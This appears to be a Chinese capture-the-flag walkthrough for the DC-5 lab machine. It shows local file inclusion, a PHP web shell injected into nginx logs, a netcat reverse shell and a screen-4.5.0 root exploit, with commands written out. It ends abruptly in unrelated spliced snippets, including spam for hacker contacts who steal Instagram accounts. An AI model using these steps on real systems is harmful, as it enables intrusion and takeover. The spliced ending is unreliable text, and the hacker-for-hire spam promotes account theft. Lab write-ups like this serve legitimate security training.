DC-5靶机描述
获取kali的ip地址:
扫面该局域网下的所有设备:
发现DC-5靶机的ip地址为192.168.0.149,用nmap对该ip进行扫描:
发现80端口开启,在浏览器中输入该ip,发现该网站的CMS是Nginx
对该目录进行扫描:
发现并无有用信息
翻看四个界面,发现只有contact界面可以进行输入内容
随便输入信息后,点击submit,发现进入了thankyou.php页面
点击刷新后,发现底部日期发生了改变。
利用wfuzz进行扫描
wfuzz -w wordlist -w wordlist -u URL/FUZZ=FUZ2Z
发现大部分测得的字符长度都为851ch,于是将这个长度字符的对应内容都过滤掉:
wfuzz -w wordlist -w wordlist --hh 851 -w URL/FUZZ=FUZ2Z
发现变量名和文件:file=footer.php。(过程有点慢,也可以使用其他的目录扫描文件进行扫描,比如御剑,但是我用御剑没扫描到)
利用burpsuite对contact过程进行拦截
易知,file是可利用的参数。拦截后发送到Repeater,将 file后的内容改为/etc/passwd,可以查看passwd中的内容。
将文件转到/var/log/nginx/access.log日志文件下:
在burpsuite中将file后改为<?php phpinfo(); ?>,看能否记录到日志文件中
向下滑发现可以记录到日志文件中
因此,想到file后输入<?php system($_GET['cmd']); ?>,然后运行nc反弹shell。在kali中打开监听端口,连接到该端口:
利用Python获得一个交互式shell:
将无权限访问的目录过滤掉 find / name -perm -u=s -type f 2>/dev/null,得到结果:
发现可疑文件screen-4.5.0,搜索该文件漏洞,发现shell
将该shell复制到/var/www/html目录下:
查看dc5靶机下所有目录的权限,发现tmp路径有所有权限,因此,切换到tmp路径下,下载41154.sh文件
运行,发现无法运行。
于是看41154文件的内容。将一下三部分分别设为三个不同的文件
文件名分别为libhax.c, rootshell.c, run.sh,注意最后一个文件开头要加上#!/bin/bash,然后运行代码
gcc -fPIC -shared -ldl -o libhax.so libhax.c
rm -f /tmp/libhax.c
gcc -o rootshell rootshell.c
rm -f /tmp/rootshell.c
发现依旧无法运行。因此选择在命令行中输入该脚本中的每一个步骤,即
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne ?"\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls
/tmp/rootshell
运行完毕后发现自己已经是root了
切换到/root路径下,获取flag:
有的药需要饭前吃,有的药需要饭后服用,为了避免对孩子的身体造成影响,应当严格遵从医嘱,帮助药物更好的发挥作用,那么宝宝是先吃药还是先吃饭?饭前饭后吃的药有哪些?下面友谊长存带来介绍。 宝宝是先吃药还...
中新网6月15日电 据国家统计局网站消息,5月份国民经济运行延续复苏态势。各地区各部门坚决贯彻落实党中央、国务院决策部署,科学统筹疫情常态化防控和经济社会发展,复工复产复商复市扎实推进,生产需求继续改...
大家都了解,女士到一定的的年纪以后便会出現停经没法再次生孕的状况,一般是45到55岁,可是近期山东枣庄一名67岁的大龄高风险孕妈妈生下一女宝宝,这真是是惊喜了。下边我产生:67岁孕妈妈人工受孕产女是什...
ins盗号黑客联系方式相关问题 qq黑客软件破解手机版相关问题 一般黑客是学什么专业 黑客为什么不用windows(windows10黑...
本文导读目录: 1、什么是黑客? 2、什么是Hack技术? 3、黑客都需要掌握哪些知识 4、黑客是什么意思 5、什么是黑客,黑客的起源 6、黑客主要跟什么有关 7、黑客指的是什...
如今大家赶到云南西双版纳,它是彝族的新春。泰国泼水节又被称为“佛浴节”和“冷河岸寒”,是彝族、阿昌族、布朗族、佤族、德昂族、泰文中华民族和东南亚地区的传统民族节日。 戴的元旦节,大多数在六月中下旬,...